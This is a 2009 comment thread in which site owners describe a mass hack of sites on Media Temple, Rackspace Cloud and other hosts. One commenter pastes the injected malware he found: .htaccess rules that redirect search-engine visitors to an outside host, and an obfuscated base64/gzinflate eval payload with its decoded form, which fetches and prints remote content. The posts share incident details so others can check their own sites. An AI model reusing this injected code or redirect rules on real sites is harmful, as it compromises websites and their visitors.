Comments on: Media Temple, WordPress, Mass Hacking

By: DavidP

DavidP — Tue, 26 Jan 2010 04:35:09 +0000

Sorry nurmaler, the cases of this infection on Rackspace Cloud have gone up every week. Yet Rackspace wont crawl out from the rock they are hiding under and admit there is a problem with their infrastructure. Moving site off RSC for good. Bunch of deceitful people that run that place.

By: nurmaler

nurmaler — Tue, 22 Dec 2009 00:48:55 +0000

DavidP,
Have you heard back from Rackspcae on this.
I am just finding that 4-5 of my sites are identically infected (b1 tag pointing to data.js)
Any work on this site that it’s pointing to being able to collect personal information such as credit card numbers?
Thanks,
~nurmaler

By: Chris Coyier

Chris Coyier — Sun, 20 Dec 2009 14:16:57 +0000

Thanks for all the detailed info Jay. It will be nice to have this stuff available for reference.

By: JayM

JayM — Sat, 19 Dec 2009 23:11:02 +0000

One last thing: according to my host, the ip address of the hacker was 188.120.226.4 which is in Russia.

The range of ip’s from this provider is 188.120.224.0 - 188.120.231.255

I have added this range to my blocked list, I would really like to know if all of the other instances were related to this same range.

I doubt this represents the true address the hacker (or hack-bot) was at, but if anyone else has something similar, it might be of some use: either to include in a rejection range or for others to review their logs in case they had modifications made that they aren’t yet aware of.

By: JayM

JayM — Sat, 19 Dec 2009 23:00:41 +0000

Sorry – it looks like the Pagecode(); got filtered out so I am reformatting it:

The php files had been modified to include a line that started with “PageCode();”
followed by a php directive and this code:

eval(gzinflate(base64_decode('jVDLcoIwFN13pj/Rle4QVCbT6QIixKCiglzUTYc3SCJM0xbw6xttP6Dbe943+47YKI5ENp++p1nSpNnoxSEdorxU0qUxXw9IiTUYEg5qFIKWDLMyUVm5Vvs25p+3TYVEFM4+1lezSTDVKWGc4pJlS4/FV7eN1VkeE1SeCdQr7FzSoyNoVbfZYLi48i4RNhAl7iThfS592hQX7XYwH7yj5rKUoE7e6pNaCGq5ENT9LrC9HCzmegECwF2xuRn/0gQ1BADOFmzHPDCXeEAFXVhSK7vw3w6JCnKvqazwvVtX7CfgHyy0BxtJn05Q7InVQRTOkhY7/y9Thek53DQOcZs7dpL/im10kbtvZ//Ro91qiswAIf11qUVROOkkXku8olXPo7Bnq7u3X+u5b3YJZ18pNg3J1Rf75u1lPH59fvoB')));

The php closing tag also appeared after the semicolon, but I am not including it here because I don’t know if it is being filtered.

By: JayM

JayM — Sat, 19 Dec 2009 22:52:36 +0000

I am hosted with inmotionhosting and have a drupal site and a dolphin site. The dolphin site was affected by the same hack. The exact compromises were the addition of a redirect to my .htaccess file and gzinflate base64 code that was added to three php files. The .htaccess file was altered by the addition of the following lines: AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ing.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://4safe.in/in.cgi?4¶meter=sf [R,L] The php files had been modified to include the following code: PageCode(); This decodes to: $l="http://tourreviews.asia/links2/link.php"; if (extension_loaded("curl")){ $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);} else{$r=implode("",file($l));} print @$r; Fortunately, my host caught the upload, reset my password, restored the original files and saved the modified ones so that I was able to view them. Hopefully this information will be helpful to someone.

By: DavidP

DavidP — Sat, 12 Dec 2009 02:20:12 +0000

I am hosted with Rackspace Cloud and we have been under the same attack. Lots of people up in arms about their sites being hacked. In total I have found 5 sites of mine that have been attacked. Rackspace hasn’t released any statements on the cause.

Most of us are seeing b1 tags injected into the bottom of the websites. These scripts point to a data.js file that tries to push you to another website. Some have seen other code injected into the body tags.

By: Ryan

Ryan — Fri, 11 Dec 2009 19:41:13 +0000

It’s just issue after issue after issue with those guys. MT’s GS is like being on a monstrously large shared host with many users (and thus many opportunities for problems) as well as many delicate parts (due to the clustering) that sometimes fail. Why put up with this? Sure it’s a nice back-end and everything’s pretty and shiny, but isn’t enough enough?

(And no I’m not affiliated with any other host, I’m just a disgruntled ex-MT/GS customer who had enough of my sites being constantly down.)

By: Scott D. @mediatemple

Scott D. @mediatemple — Wed, 09 Dec 2009 16:41:56 +0000

Hello pko,

Our engineers are presently looking into this further. Please look to our System Status page for an incident update shortly. I can assure you we are taking these hacks very seriously.

By: pko

pko — Wed, 09 Dec 2009 16:28:30 +0000

09 dec 09 Today i been hacked And all the sites on my gs service have the index.htm .html .php changed to the hacker one. NO WORDPRESS NO DRUPAL, just plain html, maybe all our password are spreading in to the web now, there is some thing to do about ? thanks